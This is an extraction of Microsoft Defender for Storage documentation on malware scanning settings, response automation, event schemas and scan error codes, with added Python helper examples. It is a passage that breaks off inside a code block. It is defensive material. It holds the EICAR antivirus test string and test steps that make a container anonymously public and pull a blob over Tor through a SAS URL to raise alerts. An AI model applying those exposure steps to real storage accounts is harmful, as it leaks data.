Create a PUT request with this endpoint. Replace the subscriptionId, 
resourceGroupName, and accountName in the endpoint URL with your own Azure 
subscription ID, resource group name and storage account name accordingly. 


Request URL: 


HTTP 


PUT https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/providers/Microsoft.Security/DefenderForStorageSettings/current?api-version=2022-12-01-preview 


Request Body: 


HTTP 


{
  "properties": {
    "isEnabled": true,
    "malwareScanning": {
      "onUpload": {
        "isEnabled": true,
        "capGBPerMonth": 5000
      }
    },
    "sensitiveDataDiscovery": {
      "isEnabled": true
    },
    "overrideSubscriptionLevelSettings": true
  }
}

1. To enable malware scanning or sensitive data threat detection, set the value of 
isEnabled to true under the relevant features. 


2. To modify the malware scanning settings, edit the relevant fields under onUpload 
and make sure the value of isEnabled is true. If you want to permit unlimited 
scanning, assign the value -1 to the capGBPerMonth parameter. 


3. To disable Defender for Storage on this storage account, use the following 
request body: 


HTTP 


{
  "properties": {
    "isEnabled": false,
    "overrideSubscriptionLevelSettings": true
  }
}

Make sure you add the overrideSubscriptionLevelSettings parameter with its value 
set to true. This ensures that the settings are saved only for this storage account 
and are not overwritten by the subscription-level settings. 
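Added example, not from the page or from Microsoft: Python that builds the per-account override body above (both the enable variant and the opt-out body), builds the Log Analytics diagnostic-settings body from the "Setting up logging for malware scanning" section, and audits a set of DefenderForStorageSettings responses to report storage accounts whose override switches protection off. The resource ID format, field names and API versions come from the page; the helper names, and the account names and settings in SAMPLE_SETTINGS, are constructed.

```python
"""Per-storage-account Defender for Storage overrides: build and audit.

Added example; field names and API versions follow the page, helpers are mine.
"""
import re

SETTINGS_API_VERSION = "2022-12-01-preview"   # DefenderForStorageSettings (page)
DIAG_API_VERSION = "2021-05-01-preview"       # diagnosticSettings (page)

STORAGE_ACCOUNT_ID = re.compile(
    r"^/subscriptions/[^/]+/resourceGroups/[^/]+"
    r"/providers/Microsoft\.Storage/storageAccounts/[^/]+$")


def settings_url(storage_account_id):
    """PUT/GET endpoint for one storage account's Defender for Storage settings."""
    if not STORAGE_ACCOUNT_ID.match(storage_account_id):
        raise ValueError(f"not a storage account resource ID: {storage_account_id}")
    return ("https://management.azure.com" + storage_account_id +
            "/providers/Microsoft.Security/DefenderForStorageSettings/current"
            f"?api-version={SETTINGS_API_VERSION}")


def override_body(enabled=True, malware_scanning=True, cap_gb_per_month=5000,
                  sensitive_data_discovery=True, event_grid_topic_id=None):
    """Per-account settings body. overrideSubscriptionLevelSettings is always
    true here: without it the subscription-level settings win (page note)."""
    if not enabled:
        # Opt-out body from the page: only isEnabled and the override flag.
        return {"properties": {"isEnabled": False,
                               "overrideSubscriptionLevelSettings": True}}
    malware = {"onUpload": {"isEnabled": malware_scanning,
                            "capGBPerMonth": cap_gb_per_month}}   # -1 = unlimited
    if event_grid_topic_id:
        malware["scanResultsEventGridTopicResourceId"] = event_grid_topic_id
    return {"properties": {
        "isEnabled": True,
        "malwareScanning": malware,
        "sensitiveDataDiscovery": {"isEnabled": sensitive_data_discovery},
        "overrideSubscriptionLevelSettings": True,
    }}


def diagnostic_settings_body(workspace_id, retention_days=180):
    """Body for diagnosticSettings/service that ships ScanResults to Log Analytics."""
    return {"properties": {
        "workspaceId": workspace_id,
        "logs": [{"category": "ScanResults", "enabled": True,
                  "retentionPolicy": {"enabled": True, "days": retention_days}}],
    }}


def audit_overrides(settings_by_account):
    """Return (account, finding) pairs for accounts whose override weakens the
    subscription baseline. Input maps account name -> the `properties` object
    returned by a GET on DefenderForStorageSettings/current."""
    findings = []
    for account, props in settings_by_account.items():
        if not props.get("overrideSubscriptionLevelSettings"):
            continue                                   # inherits subscription settings
        if not props.get("isEnabled", True):
            findings.append((account, "Defender for Storage disabled by override"))
            continue
        on_upload = props.get("malwareScanning", {}).get("onUpload", {})
        if not on_upload.get("isEnabled", True):
            findings.append((account, "on-upload malware scanning disabled"))
        if not props.get("sensitiveDataDiscovery", {}).get("isEnabled", True):
            findings.append((account, "sensitive data threat detection disabled"))
    return findings


# Constructed sample of GET responses; the accounts and values are not real.
SAMPLE_SETTINGS = {
    "contosoprod":   {"isEnabled": True, "overrideSubscriptionLevelSettings": False},
    "contosodmz":    {"isEnabled": True, "overrideSubscriptionLevelSettings": True,
                      "malwareScanning": {"onUpload": {"isEnabled": True, "capGBPerMonth": -1}},
                      "sensitiveDataDiscovery": {"isEnabled": True}},
    "contosolegacy": {"isEnabled": False, "overrideSubscriptionLevelSettings": True},
    "contosologs":   {"isEnabled": True, "overrideSubscriptionLevelSettings": True,
                      "malwareScanning": {"onUpload": {"isEnabled": False, "capGBPerMonth": 5000}},
                      "sensitiveDataDiscovery": {"isEnabled": False}},
}

if __name__ == "__main__":
    for account, finding in audit_overrides(SAMPLE_SETTINGS):
        print(f"{account}: {finding}")
```

The audit only looks at accounts that set overrideSubscriptionLevelSettings, because accounts without it get whatever the subscription plan says; the interesting drift is precisely the set of accounts someone excluded, which is the exclusion scenario the note above describes.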


Next steps 


Learn more about malware scanning settings. 


Setting up response to Malware Scanning 


Set up automated responses to move or remove malicious files or to move/ingest clean 
files to another destination. Select the preferred response option that fits your scenario 
architecture. 


With Malware Scanning, you can build your automation response using the following 
scan result options: 


e Defender for Cloud security alerts 
e Event Grid events 
e Blob index tags 


Tip 


We invite you to explore the Malware Scanning feature in Defender for Storage 
through our hands-on lab. Follow the Ninja training instructions for a detailed, 
step-by-step guide on how to set up and test Malware Scanning end-to-end, 
including configuring responses to scanning results. This is part of the ‘labs’ project 
that helps customers get ramped up with Microsoft Defender for Cloud and 
provides hands-on practical experience with its capabilities. 


Here are some response options that you can use to automate your response: 


Block access to unscanned or malicious files 
using ABAC (attribute-based access control) 


You can block access to malicious and unscanned files with Microsoft Entra Attribute- 
based access control (ABAC) authorization. It allows you to set conditional access to 
blobs based on the scanning results, and allow applications and users to access only 
scanned files that are clean. 


Follow the instructions in the following video to set it up. 


Delete or move a malicious blob 


You can use code or workflow automation to delete or move malicious files to 
quarantine. 


Prepare your environment for delete or move 


e Delete the malicious file - Before setting up automated deletion, enabling soft 
delete on the storage account is recommended. It lets you undelete files in the case 
of false positives, or when security professionals want to investigate the malicious 
files. 


e Move the malicious file to quarantine - You can move files to a dedicated storage 
container or storage account that are considered as “quarantine”. You may want 
only certain users, such as a security admin or a SOC analyst, to have permission to 
access this dedicated container or storage account. 

o Using Microsoft Entra ID to control access to blob storage is considered a best 
practice. To control access to the dedicated quarantine storage container, you 
can use container-level role assignments using Microsoft Entra role-based 
access control (RBAC). Users with storage account-level permissions may still be 
able to access the “quarantine” container. You can either edit their permissions 
to be container-level or choose a different approach and move the malicious file 
to a dedicated storage account. 

o If you must use other methods, such as SAS (shared access signatures) tokens 
on the protected storage account, it's best practice to move malicious files to 
another storage account (quarantine). Then, it's best only to grant Microsoft 
Entra permission to access the quarantined storage account. 


Set up automation 


Option 1: Logic App based on Microsoft Defender for Cloud 
security alerts 


Logic App based responses are a simple, no-code approach to setting up response. 
However, the response time is slower than the event-driven code-based approach. 


1. Deploy the DeleteBlobLogicApp Azure Resource Manager (ARM) template using 
the Azure portal. 


2. Select the Logic App you deployed. 


3. Add a role assignment to the Logic App to allow it to delete blobs from your 
storage account: 


a. Go to Identity in the side menu and select Azure role assignments. 




b. Add a role assignment at the subscription level with the Storage Blob Data 
Contributor role. 


c. Create workflow automation for Microsoft Defender for Cloud alerts: 
i. Go to Microsoft Defender for Cloud in the Azure portal. 
ii. Go to Workflow automation in the side menu. 
iii. Add a new workflow: In the Alert name contains field, fill in Malicious file 
uploaded to storage account and choose your Logic app in the Actions 
section. 


iv. Select Create. 




Option 2: Function App based on Event Grid events 
A Function App provides high performance with a low latency response time. 


1. Create a Function App in the same resource group as your protected storage 
account. 


2. Add a role assignment for the Function app identity. 


a. Go to Identity in the side menu, make sure the System assigned identity status 
is On, and select Azure role assignments. 


b. Add a role assignment in the subscription or storage account levels with the 
Storage Blob Data Contributor role. 


3. Consume Event Grid events and connect an Azure Function as the endpoint type. 


4. When writing the Azure Function code, you can use our premade function sample, 
MoveMaliciousBlobEventTrigger, or write your own code to copy the blob 
elsewhere, then delete it from the source. 


For each scan result, an event is sent according to the following schema. 


Event message structure 


The event message is a JSON object that contains key-value pairs that provide detailed 
information about a malware scanning result. Here's a breakdown of each key in the 
event message: 


e id: A unique identifier for the event. 


e subject: A string that describes the resource path of the scanned blob (file) in the 
storage account. 


e data: A JSON object that contains additional information about the event: 


o correlationId: A unique identifier that can be used to correlate multiple events 
related to the same scan. 


o blobUri: The URI of the scanned blob (file) in the storage account. 
o eTag: The ETag of the scanned blob (file). 


o scanFinishedTimeUtc: The UTC timestamp when the scan was completed. 


o scanResultType: The result of the scan, for example, "Malicious" or "No 
threats found". 


o scanResultDetails: A JSON object containing details about the scan result: 


1. malwareNamesFound: An array of malware names found in the 
scanned file. 


2. sha256: The SHA-256 hash of the scanned file. 


e eventType: A string that indicates the type of event, in this case, 
"Microsoft.Security.MalwareScanningResult". 


e dataVersion: The version number of the data schema. 

e metadataVersion: The version number of the metadata schema. 

e eventTime: The UTC timestamp when the event was generated. 

e topic: The resource path of the Event Grid topic that the event belongs to. 


Here's an example of an event message: 


JSON 


{
  "id": "52d00da0-8f1a-4c3c-aa2c-24831967356b",
  "subject": "storageAccounts/<storage_account_name>/containers/app-logs-storage/blobs/EICAR - simulating malware.txt",
  "data": {
    "correlationId": "52d00da0-8f1a-4c3c-aa2c-24831967356b",
    "blobUri": "https://<storage_account_name>.blob.core.windows.net/app-logs-storage/EICAR - simulating malware.txt",
    "eTag": "0x8DB4C9327B08CBF",
    "scanFinishedTimeUtc": "2023-05-04T11:31:54.0481279Z",
    "scanResultType": "Malicious",
    "scanResultDetails": {
      "malwareNamesFound": [
        "DOS/EICAR_Test_File"
      ],
      "sha256": "275A021BBFB6489E54D471899F7DB9D1663FC695EC2FE2A2C4538AABF651FD0F"
    }
  },
  "eventType": "Microsoft.Security.MalwareScanningResult",
  "dataVersion": "1.0",
  "metadataVersion": "1",
  "eventTime": "2023-05-04T11:31:54.048375Z",
  "topic": "/subscriptions/<subscription_id>/resourceGroups/<resource_group_name>/providers/Microsoft.EventGrid/topics/<event_grid_topic_name>"
}


By understanding the structure of the event message, you can extract relevant 
information about the Malware Scanning result and process it accordingly. 


Make your applications and data flows aware of malware scanning scan results 


Malware scanning is near real-time, and usually, there's a small time window between 
the time of the upload and the time of the scan. Because storage is noncompute, there's 
no risk that malicious files are executed in your storage. The risk is users or applications 
accessing malicious files and spreading them throughout the organization. 


There are a few methods to make your applications and data flows aware of Malware 
Scanning scan results and ensure there's no way to access/process a file before it has 
been scanned and its result has been consumed and acted upon. 


Applications ingest data based on the scan result 


Option 1: Apps checking “Index tag” before processing 


One way is to update every application that accesses the storage account so that it 
checks the scan result of each file before processing it: the application reads the 
blob only if the blob index tag scan result is No threats found. 
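Added example for this option (not from the page): an application-side gate that reads a blob only when its index tags carry a clean scan result, and refuses both blobs that have not been scanned yet and blobs that were overwritten between the tag check and the read. The tag name and values are the ones the page shows; FakeBlob is a constructed stand-in for azure-storage-blob's BlobClient, whose get_blob_properties, get_blob_tags and download_blob methods the gate calls, so the check can run offline.

```python
"""Gate blob reads on the Malware Scanning blob index tags.

Added example; tag names/values follow the page, the client shape follows
azure.storage.blob.BlobClient, and FakeBlob is a constructed stand-in.
"""
from types import SimpleNamespace

RESULT_TAG = "Malware Scanning scan result"     # index tag written by the scanner
CLEAN = "No threats found"
MALICIOUS = "Malicious"


class BlobNotScanned(Exception):
    """No scan result tag yet: the upload is newer than the last scan."""


class BlobQuarantined(Exception):
    """The scan result is not a clean verdict."""


class BlobChanged(Exception):
    """The blob was overwritten between the tag check and the read."""


def scan_status(tags):
    """'clean', 'malicious', 'unknown' or 'unscanned' from a blob's index tags."""
    result = tags.get(RESULT_TAG)
    if result is None:
        return "unscanned"
    if result == CLEAN:
        return "clean"
    return "malicious" if result == MALICIOUS else "unknown"


def read_if_clean(blob):
    """Return the blob content only when its current index tags say it is clean.

    `blob` follows BlobClient: get_blob_properties().etag, get_blob_tags(), and
    download_blob() returning an object with .properties.etag and .readall()."""
    etag_before = blob.get_blob_properties().etag
    status = scan_status(blob.get_blob_tags())
    if status == "unscanned":
        raise BlobNotScanned("no scan result yet; retry after the scan completes")
    if status != "clean":
        raise BlobQuarantined(f"scan result is {status!r}; refusing to read")
    download = blob.download_blob()
    # A version uploaded after the tag check carries not-yet-scanned content and
    # a new etag, so refuse it instead of returning it as clean.
    if download.properties.etag != etag_before:
        raise BlobChanged("blob changed after the scan result was checked")
    return download.readall()


class FakeBlob:
    """Constructed stand-in for BlobClient so the gate can be exercised offline."""

    def __init__(self, tags, content=b"", etag="0x1", etag_after_download=None):
        self.tags, self.content, self.etag = tags, content, etag
        self.etag_after = etag_after_download or etag

    def get_blob_properties(self):
        return SimpleNamespace(etag=self.etag)

    def get_blob_tags(self):
        return dict(self.tags)

    def download_blob(self):
        return SimpleNamespace(properties=SimpleNamespace(etag=self.etag_after),
                               readall=lambda: self.content)


if __name__ == "__main__":
    print(read_if_clean(FakeBlob({RESULT_TAG: CLEAN}, b"report.csv contents")))
```

With the real SDK, `BlobClient.get_blob_tags()` requires the Storage Blob Data Reader role plus the tags read permission, so the identity that runs the gate needs both; the etag comparison is what keeps a re-upload of the same blob name from slipping through the window between scan and read.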


Option 2: Connect your application to a Webhook in Event Grid 
events 


You can connect your application to a Webhook in Event Grid events and use those 
events to trigger the relevant processes for files that have no threats found scan results. 
Learn more about using Webhook event delivery and validating your endpoint. 
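Added example that covers both the event schema described above and the webhook delivery of this option (it is not Microsoft's MoveMaliciousBlobEventTrigger sample): it answers Event Grid's subscription-validation handshake, rejects event types other than Microsoft.Security.MalwareScanningResult, parses blobUri into account, container and blob name, and maps each scan result to the action a quarantine automation should take. PROTECTED_ACCOUNT and the storage account name in SAMPLE_EVENT are assumed values; the rest of SAMPLE_EVENT is a copy of the page's example event.

```python
"""Webhook handler for Malware Scanning result events delivered by Event Grid.

Added example; the event fields follow the page, everything else is mine.
"""
import json
from dataclasses import dataclass, asdict
from urllib.parse import urlparse, unquote

SCAN_EVENT = "Microsoft.Security.MalwareScanningResult"
VALIDATION_EVENT = "Microsoft.EventGrid.SubscriptionValidationEvent"
PROTECTED_ACCOUNT = "contosoprod"   # assumption: the account this automation manages


@dataclass(frozen=True)
class ScanAction:
    action: str          # "quarantine", "ingest" or "ignore"
    account: str
    container: str
    blob: str
    etag: str
    malware: tuple
    sha256: str


def parse_blob_uri(uri):
    """Split https://<account>.blob.core.windows.net/<container>/<blob> into parts."""
    u = urlparse(uri)
    host = u.netloc.lower()
    if u.scheme != "https" or not host.endswith(".blob.core.windows.net"):
        raise ValueError(f"not an Azure Blob URI: {uri}")
    container, _, blob = unquote(u.path.lstrip("/")).partition("/")
    if not container or not blob:
        raise ValueError(f"URI has no container/blob path: {uri}")
    return host.split(".", 1)[0], container, blob


def classify(event):
    """Map one scan-result event to the action the automation should take."""
    if event.get("eventType") != SCAN_EVENT:
        raise ValueError(f"unexpected eventType {event.get('eventType')!r}")
    data = event["data"]
    account, container, blob = parse_blob_uri(data["blobUri"])
    result = data.get("scanResultType")
    if account != PROTECTED_ACCOUNT:
        action = "ignore"         # a topic may carry events for other accounts
    elif result == "Malicious":
        action = "quarantine"     # move to the quarantine container, then delete
    elif result == "No threats found":
        action = "ingest"         # safe to hand to downstream processing
    else:
        action = "ignore"         # anything else is not a clean verdict
    details = data.get("scanResultDetails") or {}
    return ScanAction(action, account, container, blob, data.get("eTag", ""),
                      tuple(details.get("malwareNamesFound") or ()),
                      details.get("sha256", ""))


def handle_request(body):
    """Webhook entry point. Event Grid POSTs a JSON array; the first delivery is
    the subscription validation handshake, which must be answered with the
    validationCode before Event Grid will deliver anything else."""
    events = json.loads(body) if isinstance(body, (str, bytes)) else body
    for ev in events:
        if ev.get("eventType") == VALIDATION_EVENT:
            return {"validationResponse": ev["data"]["validationCode"]}
    return {"actions": [asdict(classify(ev)) for ev in events
                        if ev.get("eventType") == SCAN_EVENT]}


# Constructed copy of the page's example event (account name is assumed).
SAMPLE_EVENT = {
    "id": "52d00da0-8f1a-4c3c-aa2c-24831967356b",
    "subject": "storageAccounts/contosoprod/containers/app-logs-storage/blobs/EICAR - simulating malware.txt",
    "data": {
        "correlationId": "52d00da0-8f1a-4c3c-aa2c-24831967356b",
        "blobUri": "https://contosoprod.blob.core.windows.net/app-logs-storage/EICAR - simulating malware.txt",
        "eTag": "0x8DB4C9327B08CBF",
        "scanFinishedTimeUtc": "2023-05-04T11:31:54.0481279Z",
        "scanResultType": "Malicious",
        "scanResultDetails": {
            "malwareNamesFound": ["DOS/EICAR_Test_File"],
            "sha256": "275A021BBFB6489E54D471899F7DB9D1663FC695EC2FE2A2C4538AABF651FD0F",
        },
    },
    "eventType": SCAN_EVENT,
    "dataVersion": "1.0",
    "metadataVersion": "1",
    "eventTime": "2023-05-04T11:31:54.048375Z",
    "topic": "/subscriptions/<subscription_id>/resourceGroups/<resource_group_name>/providers/Microsoft.EventGrid/topics/<event_grid_topic_name>",
}

if __name__ == "__main__":
    print(json.dumps(handle_request([SAMPLE_EVENT]), indent=2))
```

The eTag carried in the action lets the quarantine step use a conditional copy or delete, so it acts on exactly the version that was scanned; the host check assumes the public Azure blob endpoint, so adjust the suffix for sovereign clouds or custom domains.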


Use an intermediary storage account as a DMZ 


You can set up an intermediary storage account for untrusted content (DMZ) and direct 
uploading traffic to the DMZ. On the untrusted storage account, enable Malware 
Scanning and connect Event Grid and Function App to move only blobs scanned with 
the “no threat found” result to the destination storage account. 


[Diagram: uploads land in an untrusted (DMZ) storage account; only blobs scanned with the no threat found result are moved to the destination storage account.] 


Next steps 


Learn how to understand results from malware scanning in Microsoft Defender for 
Storage. 


Testing the Defender for Storage data security features 


After you enable Microsoft Defender for Storage, you can test the service and run a 
proof of concept to familiarize yourself with its features and validate that the advanced 
security capabilities effectively protect your storage accounts by generating real security 
alerts. This guide will walk you through testing various aspects of the security coverage 
offered by Defender for Storage. 


There are three main components to test: 


e Malware Scanning (if enabled) 
e Sensitive data threat detection (if enabled) 


e Activity monitoring 


Tip 
A hands-on lab to try out Malware Scanning in Defender for Storage 


We recommend you try the Ninja training instructions for detailed step-by-step 
instructions on how to test Malware Scanning end-to-end with setting up 
responses to scanning results. This is part of the ‘labs’ project that helps customers 
get ramped up with Microsoft Defender for Cloud and provides hands-on practical 
experience with its capabilities. 


Testing Malware Scanning 


Follow these steps to test Malware Scanning after enabling the feature: 


1. To verify that the setup is successful, upload a file to the storage account. You can 
use the Azure portal to upload a file. 
2. Inspect new blob index tags: 
a. After uploading the file, view the blob and examine its blob index tags. 


b. You should see two new tags: Malware Scanning scan result and Malware 
Scanning scan time. 


c. The blob index tags serve as a helpful way to view the scan results. 


3. If you don't see the new blob index tags, select the Refresh button. 


[Screenshot: the uploaded blob's Blob index tags, showing Malware Scanning scan result = No threats found and Malware Scanning scan time = UTC 2023-03-19 21:22:00Z.] 


Note 


Index tags are not supported for ADLS Gen. To test and validate your protection for 
premium block blobs, look at the generated security alert. 


Upload an EICAR test file to simulate malware upload: 
To simulate a malware upload using an EICAR test file, follow these steps: 
1. Prepare for the EICAR test file: 


a. Use an EICAR test file instead of real malware to avoid causing damage. 
Standard antimalware software treats EICAR test files as malware. 


b. Exclude an empty folder to prevent your endpoint antivirus protection from 
deleting the file. For Microsoft Defender for Endpoint (MDE) users, refer to add 
an exclusion to Windows Security. 


2. Create the EICAR test file: 


a. Copy the following string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* 
b. Paste the string into a .TXT file and save it in the excluded folder. 
3. Upload the EICAR test file to your storage account. 


4. Verify the Malware Scanning scan result index tag: 


a. Check for the Malware Scanning scan result index tag with the value Malicious. 
b. If the tags are not visible, select the Refresh button. 
5. Receive a Microsoft Defender for Cloud security alert: 
a. Navigate to Microsoft Defender for Cloud using the search bar in Azure. 
b. Select Security alerts. 
6. Review the security alert: 
a. Locate the alert titled Malicious file uploaded to storage account. 
b. Select the alert’s View full details button to see all the related details. 


7. Learn more about Defender for Storage security alerts in the reference table for all 
security alerts in Microsoft Defender for Cloud. 
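Added example for the EICAR check above (not from the page): Python that holds the standard EICAR test string, verifies that its SHA-256 matches the hash shown in the page's example scan event, uploads it with a BlobClient (assumed to be azure-storage-blob's upload_blob and get_blob_tags) and polls the blob index tags until the Malware Scanning scan result tag appears. The polling loop takes injectable sleep and clock functions so the timeout path can be exercised without waiting.

```python
"""EICAR upload check for Malware Scanning, with tag polling.

Added example; the tag name and the expected hash come from the page, the
BlobClient calls are assumed to be azure-storage-blob's.
"""
import hashlib
import time

# The standard EICAR test string (raw string: the backslash is part of it).
# An extra byte, such as an editor's trailing newline, changes the hash and
# can stop scanners from recognising the file.
EICAR = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
# SHA-256 of the file as reported in the page's example scan event
EICAR_SHA256 = "275A021BBFB6489E54D471899F7DB9D1663FC695EC2FE2A2C4538AABF651FD0F"
RESULT_TAG = "Malware Scanning scan result"


def eicar_bytes():
    """The exact 68 bytes of the test file, with no line ending."""
    return EICAR.encode("ascii")


def eicar_sha256():
    return hashlib.sha256(eicar_bytes()).hexdigest().upper()


def wait_for_scan_result(get_tags, timeout_s=120, poll_s=5,
                         sleep=time.sleep, clock=time.monotonic):
    """Poll the blob index tags until the scan result tag is present.

    Returns the tag value ('Malicious' is expected for EICAR) or None if the
    timeout elapses first; sleep/clock are injectable for offline checks."""
    deadline = clock() + timeout_s
    while True:
        value = get_tags().get(RESULT_TAG)
        if value is not None:
            return value
        if clock() >= deadline:
            return None
        sleep(poll_s)


def run_eicar_check(blob_client, **poll_args):
    """Upload the test file to a blob in a test container of the protected
    account and wait for the verdict; the 'Malicious file uploaded to storage
    account' alert described above should follow."""
    if eicar_sha256() != EICAR_SHA256:
        raise RuntimeError("EICAR content altered; scanners may not flag it")
    blob_client.upload_blob(eicar_bytes(), overwrite=True)
    return wait_for_scan_result(blob_client.get_blob_tags, **poll_args)


if __name__ == "__main__":
    print(len(eicar_bytes()), eicar_sha256())
```

With the real SDK you would construct the client with `BlobClient.from_blob_url(sas_url)` or `BlobClient(account_url, container, blob, credential=...)`; the hash self-check is there because the most common reason an EICAR test "fails" is a stray newline or BOM added by the editor that created the file.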


Testing sensitive data threat detection 


To test the sensitive data threat detection feature by uploading test data that represents 
sensitive information to your storage account, follow these steps: 
1. Create a new storage account: 
a. Choose a subscription without Defender for Storage enabled. 


b. Create a new storage account with a random name under the selected 
subscription. 


2. Set up a test container: 
a. Go to the Containers blade in the newly created storage account. 
b. Select the + Container button to create a new blob container. 
c. Name the new container test-container. 

3. Upload test data: 


a. Open a text editing application on your computer, such as Notepad or 
Microsoft Word. 


b. Create a new file and save it in a format like TXT, CSV, or DOCX. 


c. Add the following string to the file: ASD 100-22-3333 SSN Text - this is a test US 
(United States) SSN (Social Security Number). 


d. Save and upload the file to the test-container in the storage account. 




4. Enable Defender for Storage: 
a. In the Azure portal, go to Microsoft Defender for Cloud. 


b. Enable Defender for Storage on the storage account with the Sensitive data 
discovery feature enabled. 


Sensitive data discovery scans for sensitive information within the first 24 hours 
when enabled at the storage account level or when a new storage account is 
created under a subscription protected by this feature at the subscription level. 
Following this initial scan, the service will scan for sensitive information every 7 
days from the time of enablement. 


Note 


If you enable the feature and then add sensitive data on the days after 
enablement, the next scan for that newly added data will occur within the next 
7-day scanning cycle, depending on the day of the week the data was added. 


5. Change access level: 


a. Return to the Containers blade. 


b. Right-click on the test-container and select Change the access level. 




c. Choose the Container (anonymous read access for containers and blobs) 
option and select OK. 


The previous step exposes the blob container's content to the internet, which will 
trigger a security alert within 30-60 minutes. 


6. Review the security alert: 
a. Go to the Security Alerts blade. 


b. Look for the alert titled The access level of a sensitive storage blob container 
was changed to allow unauthenticated public access. 


c. Select the alert's View full details button to see all the related details. 


[Screenshot: the security alert "The access level of a sensitive storage blob container was changed to allow unauthenticated public access" (severity High, status New, dated 03/27/23), showing the alert description, the sensitivity context, the user agent of the unauthenticated access, and the MITRE ATT&CK® tactic Collection] 


Learn more about Defender for Storage security alerts in the reference table for all 
security alerts in Microsoft Defender for Cloud. 


Testing activity monitoring 


To test the activity monitoring feature by simulating access from a Tor exit node to a 
storage account, follow these steps: 


1. Create a new storage account with a random name. 
2. Set up a test container: 

a. Go to the Containers blade in the storage account. 

b. Select the + Container button to create a new blob container. 

c. Name the new container test-container-tor. 
3. Upload any file to the test-container-tor. 
4. Generate a SAS (shared access signature) token: 

a. Right-click on the uploaded file and select Generate SAS. 

b. Select the Generate SAS token and URL button. 

c. Copy the Blob SAS URL. 
5. Download the file using a Tor browser: 

a. Open a Tor browser. 

b. Paste the SAS URL into the address bar and press Enter. 

c. Download the file when prompted. 

The previous step will trigger a Tor anomaly security alert within 1-3 hours. 
6. Review the security alert: 

a. Go to the Security Alerts blade. 


b. Look for the alert titled Access from a Tor exit node to a storage blob 
container. 


c. Select the alert's View full details button to see all the related details. 


Learn more about Defender for Storage security alerts in the reference table for all 
security alerts in Microsoft Defender for Cloud. 


Next steps 


In this article, you learned how to test data protection and threat detection in Defender 
for Storage. 


Learn more about: 

• Threat response 
• Customizing data sensitivity settings 
• Threat detection and alerts 


Understanding malware scanning results 

When a blob is scanned for malware, the scan result can be assessed in several ways: 


• A blob index tag - an index tag with the key "Malware Scanning scan result" (index 
tags aren't supported in storage accounts with hierarchical namespaces enabled). 

• An Event Grid message - allows you to automate responses to scan results. It 
requires more configuration. Learn more about setting up Event Grid for malware 
scanning. 

• A Log Analytics Workspace log entry - by utilizing this method, you can store all 
scan results in a centralized log repository. This repository is designed for easy 
querying, making it a powerful tool for tracking and analyzing scan results. Learn 
more about setting up logging for malware scanning and the Event Grid message 
structure. 

• A security alert in Defender for Cloud (if malware was detected) - you can read 
more about Microsoft Defender for Cloud security alerts. 


Whether you're looking to automate responses to specific scan outcomes or to keep a 
detailed record of all scans, these options can be tailored to meet your needs. 


Scan results fall into two categories: successful states and error states. Understanding 
these states is important for interpreting the results of malware scanning and taking 
appropriate action. 


Note 


For storage accounts that exceed the throughput capacity and blob size limits for 
Defender for Storage malware scanning, some blobs will not be scanned and will 
not have a scan result. 


Success states 

When a blob is successfully scanned, the scan result indicates either: 

• No threats found - the scan found no malicious content. 

• Malicious - malicious content was found in the uploaded blob. 

[Screenshot: the blob index tags of a scanned blob, with the keys "Malware Scanning scan result" and "Malware Scanning scan time UTC"] 


Error states 


Malware scanning may fail to scan a blob. When this happens, the scan result indicates 
what the error was. For each error message below, the cause of the error, the guidance, 
and whether the failed scanning attempt incurs a charge are listed. 


SAM259201: "Scan failed - internal service error." 
Cause of error: An unexpected internal system error occurred during the scan. 
Guidance: This is a transient error and subsequent upload of blobs that failed to be 
scanned with this error should succeed. 
Incurs a charge: No 

SAM259203: "Scan failed - couldn't access the requested blob." 
Cause of error: The blob couldn't be accessed due to permission restrictions. This can 
happen if someone has accidentally removed the malware scanner's permission to read 
blobs. Permissions can also be removed by an Azure Policy. 
Guidance: Look at the storage account's Activity Log to determine who or what removed 
the scanner's permissions. Re-enable Malware scanning. 
Incurs a charge: No 

SAM259204: "Scan failed - the requested blob wasn't found." 
Cause of error: The blob wasn't found. This may be due to deletion, relocation, or 
renaming after uploading. 
Guidance: N/A 
Incurs a charge: No 

SAM259205: "Scan failed due to ETag mismatch - blob was possibly overwritten." 
Cause of error: During the process of scanning a blob, Malware Scanning ensures that 
the ETag value of the blob remains consistent with what it was when first uploaded. If 
the ETag doesn't match the expected value, it could indicate that the blob has been 
altered by another process or user after the upload. 
Guidance: N/A 
Incurs a charge: No 

SAM259206: "Scan aborted - the requested blob exceeded the maximum allowed size of 2 GB." 
Cause of error: The blob size exceeded the existing size limit, preventing the scan. For 
more information, see the malware scanning limitations documentation. 
Guidance: N/A 
Incurs a charge: No 

SAM259207: "Scan timed out - the requested scan exceeded the ScanTimeout minutes time 
limitation." 
Cause of error: The scan timed out before completion. This error may also occur if a 
preceding step, such as downloading the blob for scanning, takes too long. 
Guidance: This is a transient error and subsequent upload of blobs that failed to be 
scanned with this error should succeed. 
Incurs a charge: No 

SAM259208: "Scan failed - archive access tier isn't supported." 
Cause of error: Blobs in Azure's archive storage tier can't be scanned. For more 
information, see the malware scanning limitations documentation. 
Guidance: N/A 
Incurs a charge: No 

SAM259209: "Scan failed - blobs encrypted with customer provided keys aren't supported." 
Cause of error: Client-side encrypted blobs can't be decrypted for scanning. For more 
information, see the malware scanning limitations documentation. 
Guidance: N/A 
Incurs a charge: No 

SAM259210: "Scan aborted - the requested blob is protected with password." 
Cause of error: The blob is password-protected and can't be scanned. For more 
information, see the malware scanning limitations documentation. 
Guidance: N/A 
Incurs a charge: Yes 

SAM259211: "Scan aborted - maximum archive nesting depth exceeded." 
Cause of error: The maximum archive nesting depth was exceeded. 
Guidance: Archive nesting is a known method for evading malware detection. Handle 
this blob with care. 
Incurs a charge: Yes 

SAM259212: "Scan aborted - the requested blob data is corrupt." 
Cause of error: The blob is corrupted, and Malware Scanning was unable to scan it. 
Guidance: N/A 
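The classifier below is an added example, not Microsoft's code or the feature's own logic: it reads the two blob index tags described above and maps each value to a pipeline action using the error table on this page. It assumes that error tag values begin with the SAM code, and the action names (release, quarantine, retry, and so on) are this example's own.

```python
"""Classify Defender for Storage Malware Scanning results from blob index tags.

Added example, not Microsoft's code: it turns the two index tags described above
into a pipeline action using the error table on this page. Error tag values are
assumed to start with the SAM code; the action names are this example's own.
"""
import re
from dataclasses import dataclass
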